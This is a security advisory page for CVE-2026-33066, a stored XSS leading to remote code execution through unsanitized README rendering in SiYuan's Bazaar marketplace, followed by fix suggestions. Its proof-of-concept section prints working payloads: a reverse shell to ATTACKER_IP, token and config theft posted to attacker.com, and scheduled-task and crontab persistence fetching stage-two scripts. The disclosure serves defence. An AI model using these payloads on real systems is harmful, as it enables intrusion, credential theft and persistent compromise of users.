Bazaar content.\n\n### Frontend: `app/src/config/bazaar.ts:607`\n\n```typescript\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response =\u003e {\n    mdElement.innerHTML = response.data.html;  // Unsanitized HTML injected into DOM\n});\n```\n\nThe backend returns unsanitized HTML, and the frontend blindly assigns it to `innerHTML` without any client-side sanitization (e.g., DOMPurify).\n\n### Electron: `app/electron/main.js:422-426`\n\n```javascript\nwebPreferences: {\n    nodeIntegration: true,\n    contextIsolation: false,\n    // ...\n}\n```\n\nAny JavaScript executing in the renderer has direct access to Node.js APIs.\n\n## Proof of Concept\n\n### Step 1: Create a malicious README\n\nCreate a GitHub repository with a valid SiYuan plugin/theme/template structure. The `README.md` contains embedded HTML:\n\n```markdown\n# Helpful Productivity Plugin\n\nThis plugin helps you organize your notes with smart templates and AI-powered suggestions.\n\n## Features\n\n- Smart template insertion\n- AI-powered note organization\n- Cross-platform sync\n\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\"\u003e\n\n## Installation\n\nInstall via the SiYuan Bazaar marketplace.\n\n## License\n\nMIT\n```\n\nThe raw `\u003cimg\u003e` tag with `onerror` handler is valid Markdown (HTML passthrough). The Lute engine preserves it because `SetSanitize(true)` is not called. The frontend renders it via `innerHTML`, and the broken image triggers `onerror`, executing `calc.exe`.\n\n### Step 2: Submit to Bazaar\n\nSubmit the repository to the SiYuan Bazaar via the standard community contribution process.\n\n### Step 3: One-click RCE\n\nWhen a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The `onerror` handler fires, executing arbitrary OS commands.\n\n### Escalation: Reverse shell\n\n```markdown\n# Cool Theme for SiYuan\n\nBeautiful dark theme with custom fonts.\n\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027bash -c \\\"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/4444 0\u003e\u00261\\\"\u0027)\"\u003e\n```\n\n### Escalation: Multi-stage payload via README\n\nA more sophisticated attack can hide the payload deeper in the README to avoid casual review:\n\n```markdown\n# Professional Note Templates\n\nA comprehensive collection of note templates for professionals.\n\n## Templates Included\n\n| Category | Count | Description |\n|----------|-------|-------------|\n| Business | 15 | Meeting notes, project plans |\n| Academic | 12 | Research notes, citations |\n| Personal | 8 | Journal, habit tracking |\n\n## Screenshots\n\n\u003c!-- Legitimate-looking image reference --\u003e\n\u003cpicture\u003e\n  \u003csource media=\"(prefers-color-scheme: dark)\" srcset=\"https://attacker.com/dark.png\"\u003e\n  \u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://attacker.com/light.png\"\u003e\n  \u003cimg src=\"https://attacker.com/screenshot.png\" alt=\"Template Preview\" onload=\"\n    var c = require(\u0027child_process\u0027);\n    var o = require(\u0027os\u0027);\n    var f = require(\u0027fs\u0027);\n    var p = require(\u0027path\u0027);\n\n    // Exfiltrate sensitive data\n    var home = o.homedir();\n    var configDir = p.join(home, \u0027.config\u0027, \u0027siyuan\u0027);\n    var data = {};\n\n    try { data.apiToken = f.readFileSync(p.join(configDir, \u0027cookie.key\u0027), \u0027utf8\u0027); } catch(e) {}\n    try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, \u0027conf.json\u0027), \u0027utf8\u0027)); } catch(e) {}\n    try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}\n\n    // Send to attacker\n    var https = require(\u0027https\u0027);\n    var payload = JSON.stringify(data);\n    var req = https.request({\n      hostname: \u0027attacker.com\u0027, port: 443, path: \u0027/collect\u0027, method: \u0027POST\u0027,\n      headers: { \u0027Content-Type\u0027: \u0027application/json\u0027, \u0027Content-Length\u0027: payload.length }\n    });\n    req.write(payload);\n    req.end();\n\n    // Drop persistence\n    if (o.platform() === \u0027win32\u0027) {\n      c.exec(\u0027schtasks /create /tn SiYuanSync /tr \\\"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\\\\\"https://attacker.com/stage2.ps1\\\\\\\"))\\\" /sc onlogon /rl highest /f\u0027);\n    } else {\n      c.exec(\u0027(crontab -l 2\u003e/dev/null; echo \\\"@reboot curl -s https://attacker.com/stage2.sh | bash\\\") | crontab -\u0027);\n    }\n  \"\u003e\n\u003c/picture\u003e\n\n## Changelog\n\n- v1.0.0: Initial release\n```\n\nThis payload:\n1. Uses `onload` instead of `onerror` (fires on successful image load from attacker\u0027s server)\n2. Exfiltrates SiYuan API token, config, hostname, username, and platform info\n3. Installs cross-platform persistence (Windows scheduled task / Linux crontab)\n4. Is buried inside a legitimate-looking `\u003cpicture\u003e` element that blends with real README content\n\n### Escalation: SVG-based payload (bypasses naive img filtering)\n\n```markdown\n## Architecture\n\n\u003csvg onload=\"require(\u0027child_process\u0027).exec(\u0027id \u003e /tmp/pwned\u0027)\"\u003e\n  \u003crect width=\"100\" height=\"100\" fill=\"blue\"/\u003e\n\u003c/svg\u003e\n```\n\n### Escalation: Details/summary element (interactive trigger)\n\n```markdown\n## FAQ\n\n\u003cdetails ontoggle=\"require(\u0027child_process\u0027).exec(\u0027whoami \u003e /tmp/pwned\u0027)\" open\u003e\n  \u003csummary\u003eHow do I install this plugin?\u003c/summary\u003e\n  Use the SiYuan Bazaar to install.\n\u003c/details\u003e\n```\n\nThe `open` attribute causes `ontoggle` to fire immediately without user interaction with the element itself.\n\n## Attack Scenario\n\n1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.\n2. The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a `\u003cpicture\u003e` tag, `\u003cdetails\u003e` block, or `\u003csvg\u003e`).\n3. Attacker submits the package to the SiYuan Bazaar via the community contribution process.\n4. A SiYuan user browses the Bazaar and clicks on the package to view its details/README.\n5. The backend renders the README via `renderREADME()` without sanitization.\n6. The frontend assigns the HTML to `innerHTML`.\n7. The injected JavaScript executes with full Node.js access.\n8. The attacker achieves RCE \u2014 reverse shell, data theft, persistence, etc.\n\n## Impact\n\n- **Full remote code execution** on any SiYuan desktop user who views the malicious package README\n- **One-click** \u2014 triggered by viewing package details in the Bazaar\n- **Supply-chain attack** via the official SiYuan community marketplace\n- Payloads can be deeply hidden in legitimate-looking README content, making code review difficult\n- Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files\n- Can install persistent backdoors across Windows, macOS, and Linux\n- Multiple HTML elements can carry payloads (`img`, `svg`, `details`, `picture`, `video`, `audio`, `iframe`, `object`, `embed`, `math`, etc.)\n- Affects all platforms: Windows, macOS, Linux\n\n## Suggested Fix\n\n### 1. Enable Lute sanitization for README rendering (`package.go`)\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n    luteEngine := lute.New()\n    luteEngine.SetSanitize(true)  // ADD THIS \u2014 matches note renderer behavior\n    luteEngine.SetSoftBreak2HardBreak(false)\n    luteEngine.SetCodeSyntaxHighlight(false)\n    linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n    luteEngine.SetLinkBase(linkBase)\n    ret = luteEngine.Md2HTML(string(mdData))\n    return\n}\n```\n\n### 2. Add client-side sanitization as defense-in-depth (`bazaar.ts`)\n\n```typescript\nimport DOMPurify from \u0027dompurify\u0027;\n\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response =\u003e {\n    mdElement.innerHTML = DOMPurify.sanitize(response.data.html);\n});\n```\n\n### 3. Long-term: Harden Electron configuration\n\n```javascript\nwebPreferences: {\n    nodeIntegration: false,\n    contextIsolation: true,\n    sandbox: true,\n}\n```",
  "id": "GHSA-4663-4mpg-879v",
  "modified": "2026-03-20T21:23:36Z",
  "published": "2026-03-18T16:09:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33066"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33066 (GCVE-0-2026-33066)

FKIE_CVE-2026-33066

GHSA-4663-4MPG-879V

Stored XSS to RCE via Unsanitized Bazaar README Rendering

Summary

Affected Component

Affected Versions

- SiYuan <= 3.5.9

Severity

Vulnerable Code

Backend: kernel/bazaar/package.go:635-645

Frontend: app/src/config/bazaar.ts:607

Electron: app/electron/main.js:422-426

Proof of Concept

Step 1: Create a malicious README

Step 2: Submit to Bazaar

Step 3: One-click RCE

Escalation: Reverse shell

Escalation: Multi-stage payload via README

Escalation: SVG-based payload (bypasses naive img filtering)

Escalation: Details/summary element (interactive trigger)

Attack Scenario

Impact

Suggested Fix

1. Enable Lute sanitization for README rendering (package.go)

2. Add client-side sanitization as defense-in-depth (bazaar.ts)

3. Long-term: Harden Electron configuration

Tags

Sightings

Nomenclature

Backend: `kernel/bazaar/package.go:635-645`

Frontend: `app/src/config/bazaar.ts:607`

Electron: `app/electron/main.js:422-426`

1. Enable Lute sanitization for README rendering (`package.go`)

2. Add client-side sanitization as defense-in-depth (`bazaar.ts`)